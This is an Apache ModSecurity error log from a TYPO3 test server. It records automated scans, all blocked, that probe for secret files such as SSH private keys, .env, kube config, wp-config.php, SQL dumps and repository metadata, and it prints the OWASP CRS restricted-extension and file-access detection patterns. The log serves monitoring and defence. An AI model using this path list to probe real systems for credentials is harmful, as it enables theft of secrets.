[Thu Jan 23 16:36:06.693794 2025] [:error] [pid 654461] [client 109.202.99.36:57469] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z5Jh5u5vOoJuFFjgrDVXpAAAAAE"]
[Thu Jan 23 16:36:06.694124 2025] [:error] [pid 654461] [client 109.202.99.36:57469] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z5Jh5u5vOoJuFFjgrDVXpAAAAAE"]
[Thu Jan 23 16:36:06.703390 2025] [authz_core:error] [pid 654477] [client 109.202.99.36:19537] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Thu Jan 23 16:36:06.705358 2025] [authz_core:error] [pid 655186] [client 109.202.99.36:24893] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.sql
[Thu Jan 23 16:36:06.711435 2025] [authz_core:error] [pid 666427] [client 109.202.99.36:32851] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Thu Jan 23 16:36:06.780996 2025] [:error] [pid 654460] [client 109.202.99.36:56611] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z5Jh5lpDNFyZE1VJHqsNNwAAAAA"]
[Thu Jan 23 16:36:06.781720 2025] [:error] [pid 654460] [client 109.202.99.36:56611] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z5Jh5lpDNFyZE1VJHqsNNwAAAAA"]
[Thu Jan 23 16:36:06.782174 2025] [:error] [pid 654460] [client 109.202.99.36:56611] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z5Jh5lpDNFyZE1VJHqsNNwAAAAA"]
[Thu Jan 23 16:36:06.787973 2025] [authz_core:error] [pid 657136] [client 109.202.99.36:50551] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Jan 23 16:36:06.815656 2025] [:error] [pid 655186] [client 109.202.99.36:39213] [client 109.202.99.36] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z5Jh5kkrAENOXuDNZG7s9QAAAAY"]
[Thu Jan 23 16:36:06.815900 2025] [:error] [pid 655186] [client 109.202.99.36:39213] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z5Jh5kkrAENOXuDNZG7s9QAAAAY"]
[Thu Jan 23 16:36:06.816094 2025] [:error] [pid 655186] [client 109.202.99.36:39213] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z5Jh5kkrAENOXuDNZG7s9QAAAAY"]
[Thu Jan 23 16:36:06.891540 2025] [:error] [pid 654461] [client 109.202.99.36:10635] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z5Jh5u5vOoJuFFjgrDVXpQAAAAE"]
[Thu Jan 23 16:36:06.892971 2025] [:error] [pid 666427] [client 109.202.99.36:38641] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z5Jh5tgYiZTFZ2-KbrgiNQAAAAo"]
[Thu Jan 23 16:36:06.893918 2025] [:error] [pid 666427] [client 109.202.99.36:38641] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z5Jh5tgYiZTFZ2-KbrgiNQAAAAo"]
[Thu Jan 23 16:36:06.898404 2025] [:error] [pid 654461] [client 109.202.99.36:10635] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z5Jh5u5vOoJuFFjgrDVXpQAAAAE"]
[Thu Jan 23 16:36:06.898669 2025] [:error] [pid 654461] [client 109.202.99.36:10635] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z5Jh5u5vOoJuFFjgrDVXpQAAAAE"]
[Thu Jan 23 16:36:06.899021 2025] [:error] [pid 654461] [client 109.202.99.36:10635] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z5Jh5u5vOoJuFFjgrDVXpQAAAAE"]
[Thu Jan 23 16:36:06.899730 2025] [:error] [pid 666427] [client 109.202.99.36:38641] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z5Jh5tgYiZTFZ2-KbrgiNQAAAAo"]
[Thu Jan 23 16:36:06.929497 2025] [:error] [pid 654460] [client 109.202.99.36:24825] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z5Jh5lpDNFyZE1VJHqsNOAAAAAA"]
[Thu Jan 23 16:36:06.930351 2025] [:error] [pid 654460] [client 109.202.99.36:24825] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z5Jh5lpDNFyZE1VJHqsNOAAAAAA"]
[Thu Jan 23 16:36:06.930767 2025] [:error] [pid 654460] [client 109.202.99.36:24825] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z5Jh5lpDNFyZE1VJHqsNOAAAAAA"]
[Thu Jan 23 16:36:06.940678 2025] [:error] [pid 654464] [client 109.202.99.36:3015] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z5Jh5p4Rp1ilsaCXGbfINQAAAAQ"]
[Thu Jan 23 16:36:06.940858 2025] [:error] [pid 654462] [client 109.202.99.36:52257] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z5Jh5pRUO7PUQ45jTtdZDwAAAAI"]
[Thu Jan 23 16:36:06.940985 2025] [:error] [pid 654464] [client 109.202.99.36:3015] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z5Jh5p4Rp1ilsaCXGbfINQAAAAQ"]
[Thu Jan 23 16:36:06.941101 2025] [:error] [pid 654462] [client 109.202.99.36:52257] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z5Jh5pRUO7PUQ45jTtdZDwAAAAI"]
[Thu Jan 23 16:36:06.941246 2025] [:error] [pid 654464] [client 109.202.99.36:3015] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z5Jh5p4Rp1ilsaCXGbfINQAAAAQ"]
[Thu Jan 23 16:36:06.941426 2025] [:error] [pid 654462] [client 109.202.99.36:52257] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z5Jh5pRUO7PUQ45jTtdZDwAAAAI"]
[Thu Jan 23 16:36:06.941695 2025] [:error] [pid 654462] [client 109.202.99.36:52257] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z5Jh5pRUO7PUQ45jTtdZDwAAAAI"]
[Thu Jan 23 16:36:06.964765 2025] [authz_core:error] [pid 662367] [client 109.202.99.36:35829] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Thu Jan 23 16:36:06.976328 2025] [authz_core:error] [pid 654463] [client 109.202.99.36:62127] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloud-config.yml
[Thu Jan 23 16:36:07.064032 2025] [authz_core:error] [pid 655186] [client 109.202.99.36:29017] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Thu Jan 23 16:36:07.127443 2025] [:error] [pid 654462] [client 109.202.99.36:30067] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5Jh55RUO7PUQ45jTtdZEAAAAAI"]
[Thu Jan 23 16:36:07.127645 2025] [:error] [pid 654462] [client 109.202.99.36:30067] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5Jh55RUO7PUQ45jTtdZEAAAAAI"]
[Thu Jan 23 16:36:07.127852 2025] [:error] [pid 654462] [client 109.202.99.36:30067] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5Jh55RUO7PUQ45jTtdZEAAAAAI"]
[Thu Jan 23 16:36:07.128439 2025] [:error] [pid 654464] [client 109.202.99.36:48229] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z5Jh554Rp1ilsaCXGbfINgAAAAQ"]
[Thu Jan 23 16:36:07.128717 2025] [:error] [pid 654464] [client 109.202.99.36:48229] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z5Jh554Rp1ilsaCXGbfINgAAAAQ"]
[Thu Jan 23 16:36:07.128861 2025] [:error] [pid 654464] [client 109.202.99.36:48229] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z5Jh554Rp1ilsaCXGbfINgAAAAQ"]
[Fri Jan 24 01:23:08.946869 2025] [authz_core:error] [pid 673455] [client 45.148.10.86:50128] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jan 25 13:59:58.132740 2025] [authz_core:error] [pid 697479] [client 109.202.99.46:62601] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Sat Jan 25 13:59:58.137495 2025] [:error] [pid 697809] [client 109.202.99.46:26967] [client 109.202.99.46] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z5TgTsKsv-Xnv_ylimvWYgAAAAc"]
[Sat Jan 25 13:59:58.141017 2025] [:error] [pid 697809] [client 109.202.99.46:26967] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z5TgTsKsv-Xnv_ylimvWYgAAAAc"]
